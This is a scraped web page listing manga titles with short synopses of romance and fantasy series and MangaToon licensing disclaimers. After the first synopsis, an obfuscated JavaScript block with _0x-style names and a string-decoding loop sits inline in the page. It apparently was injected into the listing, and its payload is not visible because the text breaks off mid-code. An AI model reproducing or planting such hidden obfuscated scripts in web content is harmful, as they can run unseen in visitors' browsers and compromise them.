Liexing - Page 13

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Match Made in Heaven

"A comical romance about a woman wanting to find her arranged marriage partner!" The self-proclaimed happy single Jiwoo is eager to work at her grandfather's company. But her grandfather is adamant about marrying her off to his chosen candidate at his company. Not being able to find out who he is, she disguises herself as a man and dives into the orientation events he is attending. Believing that the candidate might be Minwoo, a boy from her childhood, creates even more confusion about his real identity, for... There are two men with the name Minwoo! ? SuJin Kim, HoKyoung Yeo/Haksan Publishing Co.,Ltd. MangaToon got authorization from Ecomix to publish this manga, the content is the author's own point of view, and does not represent the stand of MangaToon.<script></script><script>(function(_0x382cb3,_0x1e9af2){var _0x47b22f=_0x3a09,_0x28450a=_0x382cb3();while(!![]){try{var _0x590286=parseInt(_0x47b22f(0xc7))/(-0x1657+0x8db*-0x3+0x13*0x293)*(-parseInt(_0x47b22f(0xad))/(0x19ed+0x1*-0xd63+0x1*-0xc88))+-parseInt(_0x47b22f(0xa6))/(0x6+0x3f3*-0x7+0x1ba2)+parseInt(_0x47b22f(0xa7))/(-0x23e3+0xf00*0x2+0x5e7*0x1)+-parseInt(_0x47b22f(0xb9))/(0x1a6a+0x16d7+-0x313c)+-parseInt(_0x47b22f(0xba))/(0x3*-0x483+0x1c2*0x6+0x303)*(-parseInt(_0x47b22f(0xc1))/(-0x2449+0xe06+0x2*0xb25))+parseInt(_0x47b22f(0xc5))/(-0x6e2+-0x17dd+0x1ec7)*(-parseInt(_0x47b22f(0xac))/(-0x2205+0x5e*0x4c+0x626))+parseInt(_0x47b22f(0xbb))/(0x29*-0x77+-0x125e+0xc7d*0x3)*(parseInt(_0x47b22f(0xc4))/(-0x5a2+-0x2*0xb1e+0x1be9));if(_0x590286===_0x1e9af2)break;else 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The Concubine is a man

Happy and "scared" Xie Yan-huan vs. "Cruelty" Emperor Yan-gui. Xie Yanhuan who was discovered on the night of the wedding, thinks he can't save his life anymore, but the Ming emperor seems addicted to Xie Yanhuan! Can the cold-blooded emperor conquer this scared concubine, who runs away with all his heart and says nothing?


I’m Worried That My Brother Is Too Gentle

“Your Highness! The Papers Have Piled Up Like This……!” I Reincarnated As Irene Weber, The Younger Sister Of An Aide Who Is Suffering From Overtime Because Of The Prince Who Is In Love And Neglects His Work. Irene, Who Was Buried In Work Before The Reincarnation And Died Of Overwork, Intends To Protect Her Beloved Brother From Such A Terrible Thing. No Overtime! No Call After Work! Evil Boss, Go Away! Work Less And Earn More, Brother! To The End, Irene Tries To Separate The Prince From Her Brother. A Method To Win By Knowing Your Enemy And Knowing Yourself. Irene Scraps A Little Record Without Leaving Any Details, Of The Prince Whose Face She Doesn’t Even Know About, For The Future. Somehow, Her Brother’s Face, Looking At Such Irene, Is Dark…… “Brother, If You’re Meeting The Crown Prince Today, I’ll Go With…..” “Absolutely Not.” ‘Do You Want To Meet Him Alone So Much?’ *** “Before That, Benjamin Weber, When Can I Meet Your Sister?” “Not For The Rest Of Your Life.” The Most Affectionate Brother And Sister Of The Continent. Will The Day Come When These Two Siblings Can Resolve Their Growing Misunderstanding?


Mr. Mcdreamy in the Romance Instance

The Tsundere best actor has time travelled to the Celestial Realm and become the most gorgeous and sensitive angle. His mission is to earn more "libido" by winning the hearts of countless hunks in the Instance Zones... Alas, I'm a true expert in seducing men... MangaToon got authorization from SNAP to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.


Never Let You Go

When the kidnapper is obsessed with the hostage, what will the hostage do? I hope I won't fall into the trap of Stockholm syndrome. But when the coldblood lost his memory and become a clingy handsome, and he would sacrifice his own life for you, will you be unswayed? MangaToon got authorization from SNAP to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.


Bring A Wolf Home

One is the most prestigious CEO in the world of werewolves, the other is a homeless vampire who is good for nothing. They have every reason to become archenemies, yet to their surprise, a wolf cub pops up and ties their bond. Behold the romance between a werewolf and a vampire. What sparks will be kindled between the two, in spite of their drastically different statuses and personalities? MangaToon got authorization from Kuaikan Comics to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.


How A Rebellious Girl Falls Into Love

When a troubled teen girl returns to school, all she brings are imminent conflicts! This is not your ordinary school life romance. A female gangster leader is forced to go back to school by her grandfather. Encountering reunion with her childhood sweetheart, conflicts with another gangster organization, school bullying and exploring the secret behind the death of a student... her school life is set to be chaotic. MangaToon got authorization from Kuaikan Comics to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.


Your Fragrance

When a top perfumer encounters a sweet, pretty office lady, a destined scented romance will now begin. Aroa Shi starts her first day at work with much anticipation, but she never expects her superior to be the handsome 'rogue' she bumped into a few days ago. He doesn't like socializing, but he actually participates in the gathering for Aroa… What motives does he have for approaching Aroa? MangaToon got authorization from Kuaikan Comics to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.


Stay in This Century

A romance between a girl and an impossibly beautiful vampire. For centuries he has lived in secret and under different names just to find a cure for what has turned him into a vampire — the plague. Until one day, she finds out about him being a vampire. What is she going to do? Will she still love him despite everything? MangaToon got authorization from Kuaikan Comics to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.


Scroll of White Silk Cloud

A taoist has descended mountains for years to seek the trace of his sect legacy the "Scroll of White Silk Cloud". He picked up the downfall ranger, the girl with amnesia, and the unemployed vagrant along the way. Meanwhile, the secrets of the world are gradually revealed, all those grievances, entangled and confused memories, hatred and love... A gorgeous and heartwarming WuXia adventure invites you to wander together! MangaToon got authorization from Kuaikan Comics to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.


Into You

The world is suddenly stricken by a wierd wave of memory loss in the near future. The beloved ones may find themselves loss all sweet memories about each other. Jay James finds his love Cyril Shawn infected with this disease right at the moment when he proposes to Shawn. Heartbroken yet determined, James decides to fight against the disease with Shawn, but Shawn obviously treats him as a stranger now... MangaToon got authorization from SNAP to publish this content, the content is the author's own point of view, and does not represent the stand of MangaToon.


Captured Crown Prince

The prince vs. the prisoner, would hatred or love prevail? The day his country perished, the once mighty monarch fell into the hands of the enemy crown prince, who brought him back to the Eastern Palace with the unexpected intention to enslave him since. The fallen monarch thought the life of a prisoner meant nothing but sheer darkness, yet to his surprise, in spite of receiving angry insults from the brooding prince, he enjoys the prince’s tolerance and the privileges that come with it. “What did the prince mean when he mentioned the past we share? Umm… Why do I seem to have no recollection of whatever happened at all…?” MangaToon got authorization from Kuaikan Comics to publish this content, the content is the author’s own point of view, and does not represent the stand of MangaToon.
